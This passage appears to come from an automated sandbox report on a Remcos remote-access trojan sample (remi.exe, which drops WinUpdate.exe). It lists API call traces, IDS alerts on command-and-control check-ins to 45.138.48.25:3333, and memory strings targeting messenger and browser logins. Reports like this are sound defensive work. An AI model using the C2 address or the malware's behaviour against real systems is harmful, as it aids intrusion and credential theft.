                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0041B42F
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040B53A
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0044D5E9 FindFirstFileExA,6_2_0044D5E9
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_004089A9
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00406AC2 FindFirstFileW,FindNextFileW,6_2_00406AC2
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00407A8C
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00418C69
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_00408DA7
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_02E610F1
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_02E66580 FindFirstFileExA,11_2_02E66580
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_10005C00
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_10007E20
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_10018AD0 FindFirstFileExA,11_2_10018AD0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 11_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,11_2_100073F0
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00406F06
                    Source: chrome.exeMemory has grown: Private usage: 0MB later: 24MB

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49712 -> 45.138.48.25:3333
                    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 45.138.48.25:3333 -> 192.168.2.6:49712
                    Source: Malware configuration extractorIPs: 45.138.48.25
                    Source: global trafficTCP traffic: 192.168.2.6:49712 -> 45.138.48.25:3333
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
                    Source: Joe Sandbox ViewIP Address: 23.200.0.6 23.200.0.6
                    Source: Joe Sandbox ViewIP Address: 18.165.220.66 18.165.220.66
                    Source: Joe Sandbox ViewASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
                    Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49718 -> 178.237.33.50:80
                    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49747 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.5
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.48.25
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_004260F7 recv,6_2_004260F7
                    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120100v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tg1leHE4ZP6u9fN&MD=YRHauRyX HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFtGgmELRLriwzH8x-fivvIP_CI8UHr7kFM4v_6FKEmWDPCIvxRte3hajTr002h_TL1aNeI1j6ORlSqmkRZNQx_FmkF0M8cNhCaBi6LBPANpokiFTIWxmcbFALuXP2EAxlKa5X8GNoPhDGvusBS2ZbS0X4-z-ddz/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_24_11_1_1.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tg1leHE4ZP6u9fN&MD=YRHauRyX HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: WinUpdate.exe, 00000011.00000002.2198792719.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: WinUpdate.exe, WinUpdate.exe, 00000011.00000002.2198792719.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: WinUpdate.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: WinUpdate.exe, 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: WinUpdate.exe, 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                    Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                    Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                    Source: global trafficDNS traffic detected: DNS query: c.msn.com
                    Source: global trafficDNS traffic detected: DNS query: api.msn.com
                    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                    Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                    Source: chrome.exe, 0000000E.00000003.2252649248.00002C780036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253719796.00002C78009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
